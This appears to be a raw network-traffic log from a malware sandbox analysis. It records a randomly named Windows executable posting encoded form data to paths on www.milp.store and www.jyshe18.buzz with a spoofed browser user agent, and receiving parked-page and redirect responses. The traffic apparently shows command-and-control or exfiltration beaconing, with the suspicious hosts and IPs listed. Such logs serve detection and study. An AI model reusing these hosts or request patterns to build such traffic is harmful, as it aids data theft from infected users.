Jan 10, 2025 15:12:16.933244944 CET	662	OUT	POST /2j93/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 223 Connection: close Host: www.milp.store Origin: http://www.milp.store Referer: http://www.milp.store/2j93/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 4e 34 61 68 77 52 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 38 6a 62 75 39 68 35 72 2f 77 68 4d 54 74 31 51 32 70 6d 6f 71 44 6c 2f 75 55 4f 63 74 59 4a 35 6a 6b 70 5a 63 50 55 4a 4b 74 30 47 61 5a 67 4f 79 55 41 54 69 4a 4a 59 2f 35 32 38 44 35 67 4d 31 69 51 65 39 32 38 31 70 55 39 57 71 63 6c 6c 33 65 76 4d 74 78 4b 4e 72 70 4b 44 61 72 30 54 52 43 45 4f 4b 52 49 79 4b 46 76 78 36 7a 42 59 43 59 65 55 69 47 68 4f 43 75 31 55 6b 6d 66 69 46 52 31 75 35 77 30 48 66 58 64 61 74 50 32 38 55 53 71 37 4c 79 35 42 44 45 48 31 72 59 51 43 4f 52 53 71 4b 38 46 58 6c 56 4f 6e 41 3d Data Ascii: N4ahwR=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXdatP28USq7Ly5BDEH1rYQCORSqK8FXlVOnA=
Jan 10, 2025 15:12:17.574299097 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 14:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 15:12:17.574374914 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 15:12:17.574387074 CET	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 15:12:17.574398041 CET	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 10, 2025 15:12:17.574409008 CET	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50011	194.9.94.85	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:19.481877089 CET	10744	OUT	POST /2j93/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 10303 Connection: close Host: www.milp.store Origin: http://www.milp.store Referer: http://www.milp.store/2j93/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 4e 34 61 68 77 52 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 6b 6a 62 63 31 68 34 4d 54 77 69 4d 54 74 38 77 32 6f 6d 6f 71 65 6c 2f 6d 59 4f 64 52 49 4a 36 62 6b 6f 38 41 50 57 38 6d 74 2b 47 61 5a 74 75 79 52 65 6a 69 6d 4a 62 58 6c 32 38 54 35 67 4d 31 69 51 63 6c 32 37 68 31 55 77 32 71 66 31 56 33 43 2b 38 74 5a 4b 4e 7a 35 4b 44 65 37 30 6a 78 43 45 75 61 52 4f 41 53 46 33 68 36 31 4d 34 43 51 65 55 2b 4a 68 4f 65 31 31 55 34 4d 66 6c 46 52 33 59 45 70 70 57 33 4d 4f 61 46 69 6d 4f 38 75 70 5a 6a 48 36 79 66 6a 45 6c 36 45 4c 51 53 68 65 64 7a 51 5a 6c 5a 34 5a 51 5a 56 4a 50 4b 53 6f 46 39 65 45 79 78 51 4f 37 4f 66 70 76 77 4b 61 30 43 71 69 58 36 53 51 53 61 34 66 6e 42 70 63 33 58 56 39 46 6f 32 2b 7a 39 31 62 51 34 4c 59 57 36 6b 2f 2b 54 52 47 2f 69 37 5a 76 49 43 68 75 31 42 6b 6b 45 36 6e 73 36 62 32 4e 32 47 76 49 4f 67 74 62 69 63 49 45 41 33 34 2f 38 59 51 7a 58 39 55 6a 39 6c 73 46 32 7a 62 76 66 [TRUNCATED] Data Ascii: N4ahwR=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPmkjbc1h4MTwiMTt8w2omoqel/mYOdRIJ6bko8APW8mt+GaZtuyRejimJbXl28T5gM1iQcl27h1Uw2qf1V3C+8tZKNz5KDe70jxCEuaROASF3h61M4CQeU+JhOe11U4MflFR3YEppW3MOaFimO8upZjH6yfjEl6ELQShedzQZlZ4ZQZVJPKSoF9eEyxQO7OfpvwKa0CqiX6SQSa4fnBpc3XV9Fo2+z91bQ4LYW6k/+TRG/i7ZvIChu1BkkE6ns6b2N2GvIOgtbicIEA34/8YQzX9Uj9lsF2zbvfckmuGxodKjypSWrG85SeZ7IqHTotJSTu6w0hOlUqjTT2WFY9/0DhJdp9RwJsQh60JPmZBQiLMaGjz1bgkov2ARsUVv4VmpCGiY5CmHFPtdBMQ0aE7GkE1XwyIYga5yZ/r93aLHs+htjY6suSjqzJLI/nrV7aq2aPrHnxJhk4ykuhFlY7RalSufVYj8voZmhQgdLzXvy/kxXPH12CMXoB12RYAaezILFqqJL7opwb70xpR9T57eK9ykJ/667u5Y/SvfB/+yil4kyeyFcSV1MDiUUJbiURrl4ElfvftWKodi9AQ+vx8LGlGdmEBYtcNx2cxKfUVmn5RMkuT52T2D81ic+NxXUDcZpX60N9aEr0ROh0SxKCZK7t2nZWbCpMWEE7jvXrJSvi/qv5seTRyZq4KvQXkcdvDVk/XiZq6LoPSui8XkTplmCG8UAlvhTQUY2ZzlicZSv4Ni7oFvvJwpb/afTIXKQZClRm9raTYdrE8LDS0P+d2VH/e9jcRLPBihOVMUOVaOeGSa19EyaGjQZD5fb6c7soScluOp7ghxjiuUFCr7yTrmtle6yIUKwAugpHScg14YLFRXe2J7xQ01VOPe2GghysDqxAYkDBk6KCQUESDT0188GAW+SKPxxEYKI25K98eVvq9ZQG0a59tJ2LWkZZH331pxBRLW [TRUNCATED]
Jan 10, 2025 15:12:20.236526966 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 14:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 15:12:20.236573935 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 15:12:20.236589909 CET	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 15:12:20.236599922 CET	672	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jan 10, 2025 15:12:20.236932039 CET	1236	IN	Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09 Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
Jan 10, 2025 15:12:20.236946106 CET	206	IN	Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50012	194.9.94.85	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:22.034313917 CET	383	OUT	GET /2j93/?N4ahwR=Vzef3oWXaGELtgURWqWViwZISDNuEbM3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt2Xz3j/2VHhm2H9/b4tezr7V2MsZ2w2FZo28=&SJ3=vToHyHVhRPNLk HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.milp.store User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Jan 10, 2025 15:12:22.659981012 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 14:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 10, 2025 15:12:22.660003901 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 10, 2025 15:12:22.660017014 CET	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 10, 2025 15:12:22.660027981 CET	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 10, 2025 15:12:22.660041094 CET	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jan 10, 2025 15:12:22.660052061 CET	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50013	172.67.131.144	80	5764	C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:12:35.794936895 CET	648	OUT	POST /1lpi/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 203 Connection: close Host: www.jyshe18.buzz Origin: http://www.jyshe18.buzz Referer: http://www.jyshe18.buzz/1lpi/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 4e 34 61 68 77 52 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 4c 33 33 46 63 77 62 49 79 33 56 74 30 47 79 34 37 32 79 37 54 76 44 46 76 51 4a 61 6e 48 5a 6f 41 77 45 43 43 72 46 31 57 69 6c 75 6f 69 56 37 75 2b 6b 6d 6f 6a 58 7a 35 75 58 42 73 72 54 73 49 6c 55 77 44 6d 69 2b 32 6e 78 33 69 51 37 61 4f 36 6e 58 4f 36 67 4a 47 44 6e 37 78 74 74 55 62 4e 47 50 30 30 55 44 4f 42 30 47 6a 52 73 38 4a 45 62 32 51 44 77 54 67 50 64 2b 32 71 32 50 69 62 71 2f 38 58 2f 57 73 75 46 45 50 66 57 33 51 2b 63 4d 49 45 65 76 72 42 50 63 6f 44 6e 46 55 6b 53 65 70 74 37 42 39 75 68 42 63 76 37 6e 4f 79 4d 68 72 41 3d 3d Data Ascii: N4ahwR=aMSFOt46gPEmL33FcwbIy3Vt0Gy472y7TvDFvQJanHZoAwECCrF1WiluoiV7u+kmojXz5uXBsrTsIlUwDmi+2nx3iQ7aO6nXO6gJGDn7xttUbNGP00UDOB0GjRs8JEb2QDwTgPd+2q2Pibq/8X/WsuFEPfW3Q+cMIEevrBPcoDnFUkSept7B9uhBcv7nOyMhrA==
Jan 10, 2025 15:12:36.390014887 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 14:12:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.jyshe18.buzz/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ruaUFt0cALwFIwsNcD3S%2Bj04%2BQ20zM%2BO4n5p1Qib8IapcVp%2FOvocNnxoLUAY98%2Fmw9zjLpHLYDFWWop1FbBrbkU3hcdghmIjxRHTRzYj%2BJPraXcYK7hvYLVbuGsqGB0Riab%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd434e3ef4de96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1511&rtt_var=755&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=648&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center>
Jan 10, 2025 15:12:36.390036106 CET	26	IN	Data Raw: 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </body></html>0

